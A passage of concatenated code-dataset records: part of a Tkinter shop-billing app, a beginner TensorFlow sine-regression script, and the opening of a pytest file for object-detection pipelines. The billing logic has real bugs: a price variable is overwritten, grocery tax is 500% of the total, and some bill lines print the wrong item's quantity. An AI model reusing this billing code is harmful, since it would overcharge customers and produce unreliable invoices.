15', bd=7, relief=GROOVE)\r\n cphn_txt.grid(row=0, column=3, pady=5, padx=10)\r\n\r\n c_bill_lbl = Label(F1, text=\"Bill Number:\", bg=\"#badc57\", font=('times new roman', 15, 'bold'))\r\n c_bill_lbl.grid(row=0, column=4, padx=20, pady=5)\r\n c_bill_txt = Entry(F1, width=15, textvariable=self.search_bill, font='arial 15', bd=7, relief=GROOVE)\r\n c_bill_txt.grid(row=0, column=5, pady=5, padx=10)\r\n\r\n bil_btn = Button(F1, text=\"Search\", command=self.find_bill, width=10, bd=7, font=('arial', 12, 'bold'), relief=GROOVE)\r\n bil_btn.grid(row=0, column=6, pady=5, padx=10)\r\n\r\n # ===================Medical====================================\r\n F2 = LabelFrame(self.root, text=\"Medical Purpose\", font=('times new roman', 15, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F2.place(x=5, y=180, width=325, height=380)\r\n\r\n sanitizer_lbl = Label(F2, text=\"Sanitizer\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n sanitizer_lbl.grid(row=0, column=0, padx=10, 
pady=10, sticky='W')\r\n sanitizer_txt = Entry(F2, width=10, textvariable=self.sanitizer, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n sanitizer_txt.grid(row=0, column=1, padx=10, pady=10)\r\n\r\n mask_lbl = Label(F2, text=\"Mask\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n mask_lbl.grid(row=1, column=0, padx=10, pady=10, sticky='W')\r\n mask_txt = Entry(F2, width=10, textvariable=self.mask, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n mask_txt.grid(row=1, column=1, padx=10, pady=10)\r\n\r\n hand_gloves_lbl = Label(F2, text=\"Hand Gloves\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n hand_gloves_lbl.grid(row=2, column=0, padx=10, pady=10, sticky='W')\r\n hand_gloves_txt = Entry(F2, width=10, textvariable=self.hand_gloves, font=('times new roman', 16, 'bold'), bd=5, relief =GROOVE)\r\n hand_gloves_txt.grid(row=2, column=1, padx=10, pady=10)\r\n\r\n syrup_lbl = Label(F2, text=\"Syrup\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n syrup_lbl.grid(row=3, column=0, padx=10, pady=10, sticky='W')\r\n syrup_txt = Entry(F2, width=10, textvariable=self.syrup, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n syrup_txt.grid(row=3, column=1, padx=10, pady=10)\r\n\r\n cream_lbl = Label(F2, text=\"Cream\", font=('times new roman', 16, 'bold'), bg = \"#badc57\", fg = \"black\")\r\n cream_lbl.grid(row=4, column=0, padx=10, pady=10, sticky='W')\r\n cream_txt = Entry(F2, width=10, textvariable=self.cream, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n cream_txt.grid(row=4, column=1, padx=10, pady=10)\r\n\r\n thermal_gun_lbl = Label(F2, text=\"Thermal Gun\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n thermal_gun_lbl.grid(row=5, column=0, padx=10, pady=10, sticky='W')\r\n thermal_gun_txt = Entry(F2, width=10, textvariable=self.thermal_gun, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n thermal_gun_txt.grid(row=5, column=1, padx=10, pady=10)\r\n\r\n # ==========GroceryItems=========================\r\n F3 = LabelFrame(self.root, text=\"Grocery Items\", font=('times new roman', 15, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F3.place(x=340, y=180, width=325, height=380)\r\n\r\n rice_lbl = Label(F3, text=\"Rice\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n rice_lbl.grid(row=0, column=0, padx=10, pady=10, sticky='W')\r\n rice_txt = Entry(F3, width=10, textvariable=self.rice, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n rice_txt.grid(row=0, column=1, padx=10, pady=10)\r\n\r\n food_oil_lbl = Label(F3, text=\"Food Oil\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n food_oil_lbl.grid(row=1, column=0, padx=10, pady=10, sticky='W')\r\n food_oil_txt = Entry(F3, width=10, textvariable=self.food_oil, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n food_oil_txt.grid(row=1, column=1, padx=10, pady=10)\r\n\r\n wheat_lbl = Label(F3, text=\"Wheat\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n wheat_lbl.grid(row=2, column=0, padx=10, pady=10, sticky='W')\r\n wheat_txt = Entry(F3, width=10, textvariable=self.wheat, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n wheat_txt.grid(row=2, column=1, padx=10, pady=10)\r\n\r\n spices_lbl = Label(F3, text=\"Spices\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n spices_lbl.grid(row=3, column=0, padx=10, pady=10, sticky='W')\r\n 
spices_txt = Entry(F3, width=10, textvariable=self.spices, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n spices_txt.grid(row=3, column=1, padx=10, pady=10)\r\n\r\n flour_lbl = Label(F3, text=\"Flour\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n flour_lbl.grid(row=4, column=0, padx=10, pady=10, sticky='W')\r\n flour_txt = Entry(F3, width=10, textvariable=self.flour, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n flour_txt.grid(row=4, column=1, padx=10, pady=10)\r\n\r\n maggi_lbl = Label(F3, text=\"Maggi\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n maggi_lbl.grid(row=5, column=0, padx=10, pady=10, sticky='W')\r\n maggi_txt = Entry(F3, width=10, textvariable=self.maggi, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n maggi_txt.grid(row=5, column=1, padx=10, pady=10)\r\n\r\n # ===========ColdDrinks================================\r\n F4 = LabelFrame(self.root, text=\"Cold Drinks\", font=('times new roman', 15, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F4.place(x=670, y=180, width=325, height=380)\r\n\r\n sprite_lbl = Label(F4, text=\"Sprite\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n sprite_lbl.grid(row=0, column=0, padx=10, pady=10, sticky='W')\r\n sprite_txt = Entry(F4, width=10, textvariable=self.sprite, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n sprite_txt.grid(row=0, column=1, padx=10, pady=10)\r\n\r\n mineral_lbl = Label(F4, text=\"Mineral Water\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n mineral_lbl.grid(row=1, column=0, padx=10, pady=10, sticky='W')\r\n mineral_txt = Entry(F4, width=10, textvariable=self.mineral, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n mineral_txt.grid(row=1, column=1, padx=10, pady=10)\r\n\r\n juice_lbl = Label(F4, text=\"Juice\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n juice_lbl.grid(row=2, column=0, padx=10, pady=10, sticky='W')\r\n juice_txt = Entry(F4, width=10, textvariable=self.juice, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n juice_txt.grid(row=2, column=1, padx=10, pady=10)\r\n\r\n coke_lbl = Label(F4, text=\"Coke\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n coke_lbl.grid(row=3, column=0, padx=10, pady=10, sticky='W')\r\n coke_txt = Entry(F4, width=10, textvariable=self.coke, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n coke_txt.grid(row=3, column=1, padx=10, pady=10)\r\n\r\n lassi_lbl = Label(F4, text=\"Lassi\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n lassi_lbl.grid(row=4, column=0, padx=10, pady=10, sticky='W')\r\n lassi_txt = Entry(F4, width=10, textvariable=self.lassi, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n lassi_txt.grid(row=4, column=1, padx=10, pady=10)\r\n\r\n mountain_duo_lbl = Label(F4, text=\"Mountain Duo\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n mountain_duo_lbl.grid(row=5, column=0, padx=10, pady=10, sticky='W')\r\n mountain_duo_txt = Entry(F4, width=10, textvariable=self.mountain_duo, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n mountain_duo_txt.grid(row=5, column=1, padx=10, pady=10)\r\n\r\n # =================BillArea======================\r\n F5 = Frame(self.root, bd=10, relief=GROOVE)\r\n F5.place(x=1010, y=180, width=350, height=380)\r\n\r\n bill_title = Label(F5, text=\"Bill Area\", font='arial 15 bold', bd=7, 
relief=GROOVE)\r\n bill_title.pack(fill=X)\r\n scroll_y = Scrollbar(F5, orient=VERTICAL)\r\n self.txtarea = Text(F5, yscrollcommand=scroll_y.set)\r\n scroll_y.pack(side=RIGHT, fill=Y)\r\n scroll_y.config(command=self.txtarea.yview)\r\n self.txtarea.pack(fill=BOTH, expand=1)\r\n\r\n # =======================ButtonFrame=============\r\n F6 = LabelFrame(self.root, text=\"Bill Area\", font=('times new roman', 14, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F6.place(x=0, y=560, relwidth=1, height=140)\r\n\r\n m1_lbl = Label(F6, text=\"Total Medical Price\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m1_lbl.grid(row=0, column=0, padx=20, pady=1, sticky='W')\r\n m1_txt = Entry(F6, width=18, textvariable=self.medical_price, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m1_txt.grid(row=0, column=1, padx=18, pady=1)\r\n\r\n m2_lbl = Label(F6, text=\"Total Grocery Price\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m2_lbl.grid(row=1, column=0, padx=20, pady=1, sticky='W')\r\n m2_txt = Entry(F6, width=18, textvariable=self.grocery_price, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m2_txt.grid(row=1, column=1, padx=18, pady=1)\r\n\r\n m3_lbl = Label(F6, text=\"Total Cold Drinks Price\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m3_lbl.grid(row=2, column=0, padx=20, pady=1, sticky='W')\r\n m3_txt = Entry(F6, width=18, textvariable=self.cold_drinks_price, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m3_txt.grid(row=2, column=1, padx=18, pady=1)\r\n\r\n m4_lbl = Label(F6, text=\"Medical Tax\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m4_lbl.grid(row=0, column=2, padx=20, pady=1, sticky='W')\r\n m4_txt = Entry(F6, width=18, textvariable=self.medical_tax, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m4_txt.grid(row=0, column=3, padx=18, pady=1)\r\n\r\n m5_lbl = Label(F6, text=\"Grocery Tax\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m5_lbl.grid(row=1, column=2, padx=20, pady=1, sticky='W')\r\n m5_txt = Entry(F6, width=18, textvariable=self.grocery_tax, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m5_txt.grid(row=1, column=3, padx=18, pady=1)\r\n\r\n m6_lbl = Label(F6, text=\"Cold Drinks Tax\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m6_lbl.grid(row=2, column=2, padx=20, pady=1, sticky='W')\r\n m6_txt = Entry(F6, width=18, textvariable=self.cold_drinks_tax, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m6_txt.grid(row=2, column=3, padx=18, pady=1)\r\n\r\n # =============Buttons-======================================\r\n btn_f = Frame(F6, bd=7, relief=GROOVE)\r\n btn_f.place(x=760, width=580, height=105)\r\n\r\n total_btn = Button(btn_f, command=self.total, text=\"Total\", bg=\"#535C68\", bd=2, fg=\"white\", pady=15, width=12, font='arial 13 bold')\r\n total_btn.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n generateBill_btn = Button(btn_f, command=self.bill_area, text=\"Generate Bill\", bd=2, bg=\"#535C68\", fg=\"white\", pady=12, width=12, font='arial 13 bold')\r\n generateBill_btn.grid(row=0, column=1, padx=5, pady=5)\r\n\r\n clear_btn = Button(btn_f, command=self.clear_data, text=\"Clear\", bg=\"#535C68\", bd=2, fg=\"white\", pady=15, width=12, font='arial 13 bold')\r\n clear_btn.grid(row=0, column=2, padx=5, pady=5)\r\n\r\n exit_btn = Button(btn_f, command=self.exit_app, text=\"Exit\", bd=2, bg=\"#535C68\", fg=\"white\", pady=15, width=12, font='arial 13 bold')\r\n exit_btn.grid(row=0, column=3, padx=5, 
pady=5)\r\n self.welcome_bill()\r\n \r\n # ==================totalBill============================\r\n def total(self):\r\n self.m_h_g_p = self.hand_gloves.get()*12\r\n self.m_s_p = self.sanitizer.get()*2\r\n self.m_m_p = self.mask.get()*5\r\n self.m_s_p = self.syrup.get()*30\r\n self.m_c_p = self.cream.get()*5\r\n self.m_t_g_p = self.thermal_gun.get()*15\r\n self.total_medical_price = float(self.m_m_p+self.m_h_g_p+self.m_s_p+self.m_c_p+self.m_t_g_p+self.m_s_p)\r\n\r\n self.medical_price.set(\"Rs. \"+str(self.total_medical_price))\r\n self.c_tax = round((self.total_medical_price*0.05), 2)\r\n self.medical_tax.set(\"Rs. \"+str(self.c_tax))\r\n\r\n self.g_r_p = self.rice.get()*10\r\n self.g_f_o_p = self.food_oil.get()*10\r\n self.g_w_p = self.wheat.get()*10\r\n self.g_s_p = self.spices.get()*6\r\n self.g_f_p = self.flour.get()*8\r\n self.g_m_p = self.maggi.get()*5\r\n self.total_grocery_price = float(self.g_r_p+self.g_f_o_p+self.g_w_p+self.g_s_p+self.g_f_p+self.g_m_p)\r\n\r\n self.grocery_price.set(\"Rs. \" + str(self.total_grocery_price))\r\n self.g_tax = round((self.total_grocery_price*5), 2)\r\n self.grocery_tax.set(\"Rs. \" + str(self.g_tax))\r\n\r\n self.c_d_s_p = self.sprite.get()*10\r\n self.c_d_w_p = self.mineral.get()*10\r\n self.c_d_j_p = self.juice.get()*10\r\n self.c_d_c_p = self.coke.get()*10\r\n self.c_d_l_p = self.lassi.get()*10\r\n self.c_m_d = self.mountain_duo.get()*10\r\n self.total_cold_drinks_price = float(self.c_d_s_p+self.c_d_w_p+self.c_d_j_p+self.c_d_c_p+self.c_d_l_p+self.c_m_d)\r\n\r\n self.cold_drinks_price.set(\"Rs. \"+str(self.total_cold_drinks_price))\r\n self.c_d_tax = round((self.total_cold_drinks_price * 0.1), 2)\r\n self.cold_drinks_tax.set(\"Rs. \"+str(self.c_d_tax))\r\n\r\n self.total_bill = float(self.total_medical_price+self.total_grocery_price+self.total_cold_drinks_price+self.c_tax+self.g_tax+self.c_d_tax)\r\n \r\n # ======================welcomeBill=============================== \r\n def welcome_bill(self):\r\n self.txtarea.delete('1.0', END)\r\n self.txtarea.insert(END, \"\\tWelcome Grocery Retail\")\r\n self.txtarea.insert(END, f\"\\nBill Number:{self.bill_no.get()}\")\r\n self.txtarea.insert(END, f\"\\nCustomer Name:{self.c_name.get()}\")\r\n self.txtarea.insert(END, f\"\\nPhone Number{self.c_phone.get()}\")\r\n self.txtarea.insert(END, f\"\\n================================\")\r\n self.txtarea.insert(END, f\"\\nProducts\\t\\tQTY\\t\\tPrice\")\r\n \r\n# =============================generatebill=================================\r\n def bill_area(self):\r\n if self.c_name.get() == \" \" or self.c_phone.get() == \" \":\r\n messagebox.showerror(\"Error\", \"Customer Details Are Must\")\r\n elif self.medical_price.get() == \"Rs. 0.0\" and self.grocery_price.get() == \"Rs. 0.0\" and self.cold_drinks_price.get()==\"Rs. 
0.0\":\r\n messagebox.showerror(\"Error\", \"No Product Purchased\")\r\n else:\r\n self.welcome_bill()\r\n # ============medical===========================\r\n if self.sanitizer.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Sanitizer\\t\\t{self.sanitizer.get()}\\t\\t{self.m_s_p}\")\r\n if self.mask.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Mask\\t\\t{self.mask.get()}\\t\\t{self.m_m_p}\")\r\n if self.hand_gloves.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Hand Gloves\\t\\t{self.hand_gloves.get()}\\t\\t{self.m_h_g_p}\")\r\n if self.syrup.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Syrup\\t\\t{self.syrup.get()}\\t\\t{self.m_s_p}\")\r\n if self.cream.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Cream\\t\\t{self.cream.get()}\\t\\t{self.m_c_p}\")\r\n if self.thermal_gun.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Thermal Gun\\t\\t{self.sanitizer.get()}\\t\\t{self.m_t_g_p}\")\r\n # ==============Grocery============================\r\n if self.rice.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Rice\\t\\t{self.rice.get()}\\t\\t{self.g_r_p}\")\r\n if self.food_oil.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Food Oil\\t\\t{self.food_oil.get()}\\t\\t{self.g_f_o_p}\")\r\n if self.wheat.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Wheat\\t\\t{self.wheat.get()}\\t\\t{self.g_w_p}\")\r\n if self.spices.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Spices\\t\\t{self.spices.get()}\\t\\t{self.g_s_p}\")\r\n if self.flour.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Flour\\t\\t{self.flour.get()}\\t\\t{self.g_f_p}\")\r\n if self.maggi.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Maggi\\t\\t{self.maggi.get()}\\t\\t{self.g_m_p}\")\r\n #================ColdDrinks==========================\r\n if self.sprite.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Sprite\\t\\t{self.sprite.get()}\\t\\t{self.c_d_s_p}\")\r\n if self.mineral.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Mineral\\t\\t{self.mineral.get()}\\t\\t{self.c_d_w_p}\")\r\n if self.juice.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Juice\\t\\t{self.juice.get()}\\t\\t{self.c_d_j_p}\")\r\n if self.coke.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Coke\\t\\t{self.coke.get()}\\t\\t{self.c_d_c_p}\")\r\n if self.lassi.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Lassi\\t\\t{self.cream.get()}\\t\\t{self.c_d_l_p}\")\r\n if self.mountain_duo.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Mountain Duo\\t\\t{self.sanitizer.get()}\\t\\t{self.c_m_d}\")\r\n self.txtarea.insert(END, f\"\\n--------------------------------\")\r\n # ===============taxes==============================\r\n if self.medical_tax.get() != '0.0':\r\n self.txtarea.insert(END, f\"\\n Medical Tax\\t\\t\\t{self.medical_tax.get()}\")\r\n if self.grocery_tax.get() != '0.0':\r\n self.txtarea.insert(END, f\"\\n Grocery Tax\\t\\t\\t{self.grocery_tax.get()}\")\r\n if self.cold_drinks_tax.get() != '0.0':\r\n self.txtarea.insert(END, f\"\\n Cold Drinks Tax\\t\\t\\t{self.cold_drinks_tax.get()}\")\r\n\r\n self.txtarea.insert(END, f\"\\n Total Bil:\\t\\t\\t Rs.{self.total_bill}\")\r\n self.txtarea.insert(END, f\"\\n--------------------------------\")\r\n self.save_bill()\r\n\r\n def save_bill(self):\r\n op = messagebox.askyesno(\"Save Bill\", \"Do you want to save the bill?\")\r\n if op > 0:\r\n self.bill_data = self.txtarea.get('1.0', END)\r\n f1 = open(\"bills/\"+str(self.bill_no.get())+\".txt\", \"w\")\r\n f1.write(self.bill_data)\r\n f1.close()\r\n messagebox.showinfo(\"Saved\", f\"Bill no:{self.bill_no.get()} Saved Successfully\")\r\n else:\r\n return\r\n 
\r\n #=======================findBill=============================\r\n def find_bill(self):\r\n present = \"no\"\r\n for i in os.listdir(\"bills/\"):\r\n if i.split('.')[0] == self.search_bill.get():\r\n f1 = open(f\"bills/{i}\", \"r\")\r\n self.txtarea.delete(\"1.0\", END)\r\n for d in f1:\r\n self.txtarea.insert(END, d)\r\n f1.close()\r\n present = \"yes\"\r\n if present == \"no\":\r\n messagebox.showerror(\"Error\", \"Invalid Bill No\")\r\n\r\n #===========================clearsection=====================\r\n def clear_data(self):\r\n op = messagebox.askyesno(\"Clear\", \"Do you really want to Clear?\")\r\n if op > 0:\r\n self.sanitizer.set(0)\r\n self.mask.set(0)\r\n self.hand_gloves.set(0)\r\n self.syrup.set(0)\r\n self.cream.set(0)\r\n self.thermal_gun.set(0)\r\n # ============grocery==============================\r\n self.rice.set(0)\r\n self.food_oil.set(0)\r\n self.wheat.set(0)\r\n self.spices.set(0)\r\n self.flour.set(0)\r\n self.maggi.set(0)\r\n # =============coldDrinks=============================\r\n self.sprite.set(0)\r\n self.mineral.set(0)\r\n self.juice.set(0)\r\n self.coke.set(0)\r\n self.lassi.set(0)\r\n self.mountain_duo.set(0)\r\n # =============taxes==========================================\r\n self.medical_price.set(\"\")\r\n self.grocery_price.set(\"\")\r\n self.cold_drinks_price.set(\"\")\r\n\r\n self.medical_tax.set(\"\")\r\n self.grocery_tax.set(\"\")\r\n self.cold_drinks_tax.set(\"\")\r\n\r\n self.c_name.set(\"\")\r\n self.c_phone.set(\"\")\r\n\r\n self.bill_no.set(\"\")\r\n x = random.randint(1000, 9999)\r\n self.bill_no.set(str(x))\r\n\r\n self.search_bill.set(\"\")\r\n self.welcome_bill()\r\n\r\n # ======================exitsection==============================\r\n def exit_app(self):\r\n op = messagebox.askyesno(\"Exit\", \"Do you really want to exit?\")\r\n if op > 0:\r\n self.root.destroy()\r\n\r\n\r\nroot = Tk()\r\nobj = Bill_App(root)\r\nroot.mainloop()\r\n\r\n#==== End of code=======================\r\n","sub_path":"GUIScripts/Billing System/billing_system.py","file_name":"billing_system.py","file_ext":"py","file_size_in_byte":23853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"431771266","text":"import tensorflow as tf \nfrom tensorflow.keras import layers\nimport numpy as np\nimport math\n\n# REMEMBER, size(data)==input_shape of first layer>batch_size\n\ndata = np.linspace(0.0,(math.pi)/2,num=32) #Input\nlabels = np.sin(data) #Output\n\nval_data = np.linspace(0.0,(math.pi)/2,num=10)\nval_labels = np.sin(val_data)\n\n\n#code which makes a sequential neural network, adds 3 layers of [64,64,10]\n\n# model = tf.keras.Sequential()\n\n# model.add(layers.Dense(64, activation='sigmoid'))#or u can use tf.sigmoid\n# model.add(layers.Dense(64, activation=tf.sigmoid))\n\n# layers.Dense(64, kernal_regularizer=tf.keras.regularizers.l1(0.01)) # A linear layer with L1 regularization of factor 0.01 applied to the kernel matrix\n\n# layers.Dense(64, bias_regularizer=tf.keras.regularizers.l2(0.01)) ## A linear layer with L2 regularization of factor 0.01 applied to the bias vector:\n\n# layers.Dense(64, kernel_initializer='orthogonal') #Initializes a kernal with Random Orthogonal Matrix\n\n# layers.Dense(64, bias_initializer=tf.keras.initializers.constant(2.0))# A linear layer with a bias vector initialized to 2.0s:\n\n# model.add(layers.Dense(10, activation='softmax'))\n\n\nmodel = tf.keras.Sequential([\n# Adds a densely-connected layer with 64 units to the model:\nlayers.Dense(64, activation='sigmoid', input_shape=(1,)),\n# Add another:\nlayers.Dense(64, activation='sigmoid'),\n# Add a softmax layer with 10 output units:\nlayers.Dense(1, activation='tanh')])\n\n# model.compile(optimizer=tf.train.AdamOptimizer(0.001),\n# \tloss='categorical_crossentropy',\n# \tmetrics=['accuracy'])\n\n# Configure a model for mean-squared error regression.\nmodel.compile(optimizer=tf.train.AdamOptimizer(0.01),\n\tloss='mse', # mean squared error\n\tmetrics=['mae']) # mean absolute error\n\n# Configure a model for categorical classification.\n# model.compile(optimizer=tf.train.RMSPropOptimizer(0.01), \n\t# loss=tf.keras.losses.categorical_crossentropy,\n\t# metrics=[tf.keras.metrics.categorical_accuracy])\n\ncallbacks = [\n # Interrupt training if `val_loss` stops improving for over 2 epochs\n tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),\n # Write TensorBoard logs to `./logs` directory\n tf.keras.callbacks.TensorBoard(log_dir='./logs')\n]\n\nmodel.fit(data, labels, epochs=200, batch_size=1, validation_data=(val_data, val_labels)) \n\nmodel.evaluate(data, labels, batch_size=1)\n\nresult = model.predict(data, batch_size=32)\n\nprint(result.T) #[start:stop:step]\nprint((labels[:]))\n\na=np.array([1])\n\nprint(model.predict(a,batch_size=1)) #Predict output of Sin(1)\n\n# model.evaluate(dataset, steps=30)\n","sub_path":"1_BASIC/5_callbacks.py","file_name":"5_callbacks.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"411927017","text":"import pytest\nimport numpy as np\n\nimport os\nfrom tensorflow.keras.utils import get_file\nfrom paz.backend.image import load_image\n\nfrom paz.pipelines import SSD512COCO, SSD300VOC, SSD300FAT, SSD512YCBVideo\nfrom paz.pipelines import HaarCascadeFrontalFace\nfrom paz.pipelines import DetectFaceKeypointNet2D32\nfrom paz.pipelines import DetectMiniXceptionFER\nfrom paz.abstract.messages import Box2D\n\n\n@pytest.fixture\ndef image_with_everyday_objects():\n URL = ('https://github.com/oarriaga/altamira-data/releases/download'\n '/v0.9.1/image_with_everyday_classes.jpg')\n filename = os.path.basename(URL)\n fullpath = get_file(filename, URL, cache_subdir='paz/tests')\n image = load_image(fullpath)\n return image\n\n\n@pytest.fixture\ndef image_with_tools():\n URL = ('https://github.com/oarriaga/altamira-data/releases/download'\n '/v0.9.1/image_with_tools.jpg')\n filename = os.path.basename(URL)\n fullpath = get_file(filename, URL, cache_subdir='paz/tests')\n image = load_image(fullpath)\n return image\n\n\n@pytest.fixture\ndef image_with_faces():\n URL = ('https://github.com/oarriaga/altamira-data/releases/download'\n '/v0.9.1/image_with_faces.jpg')\n filename = os.path.basename(URL)\n fullpath = get_file(filename, URL, cache_subdir='paz/tests')\n image = load_image(fullpath)\n return image\n\n\n@pytest.fixture\ndef boxes_SSD512COCO():\n boxes2D = [\n Box2D(np.array([544, 373, 1018, 807]), 0.9982471, 'person'),\n Box2D(np.array([483, 710, 569, 819]), 0.78569597, 'cup'),\n Box2D(np.array([943, 182, 1083, 341]), 0.7874794, 'potted plant'),\n Box2D(np.array([150, 721, 1413, 993]), 0.6786173, 'dining table'),\n Box2D(np.array([577, 619, 895, 820]), 0.83648031, 'laptop')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_SSD300VOC():\n boxes2D = [\n Box2D(np.array([510, 383, 991, 806]), 0.99694544, 'person'),\n Box2D(np.array([954, 192, 1072, 350]), 0.7211749, 'pottedplant')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_SSD300FAT():\n boxes2D = [\n Box2D(np.array([110, 96, 150, 125]), 0.626648, '007_tuna_fish_can'),\n Box2D(np.array([41, 93, 146, 167]), 0.7510558, '035_power_drill'),\n Box2D(np.array([171, 22, 227, 131]), 0.793466, '006_mustard_bottle'),\n Box2D(np.array([99, 6, 151, 107]), 0.50704032, '003_cracker_box')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_SSD512YCBVideo():\n boxes2D = [\n Box2D(np.array([115, 121, 215, 155]), 0.9056605, '011_banana'),\n Box2D(np.array([38, 93, 162, 164]), 0.839406490, '035_power_drill'),\n Box2D(np.array([173, 25, 217, 123]), 0.99889081, '006_mustard_bottle'),\n Box2D(np.array([93, 11, 148, 104]), 0.825154304, '003_cracker_box')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_HaarCascadeFace():\n boxes2D = [\n Box2D(np.array([701, 362, 827, 488]), 1.0, 'Face'),\n Box2D(np.array([488, 408, 612, 532]), 1.0, 'Face'),\n Box2D(np.array([855, 466, 974, 585]), 1.0, 'Face')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_MiniXceptionFER():\n boxes2D = [\n Box2D(np.array([701, 362, 827, 488]), 0.49472683, 'neutral'),\n Box2D(np.array([488, 408, 612, 532]), 0.28161105, 'sad'),\n Box2D(np.array([855, 466, 974, 585]), 0.98590159, 'happy')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_FaceKeypointNet2D32():\n boxes2D = [\n Box2D(np.array([701, 362, 827, 488]), 1.0, 'Face'),\n Box2D(np.array([488, 408, 612, 532]), 1.0, 'Face'),\n Box2D(np.array([855, 466, 974, 585]), 1.0, 'Face')]\n return boxes2D\n\n\ndef assert_inferences(detector, image, labelled_boxes):\n inferences = detector(image)\n predicted_boxes2D = 
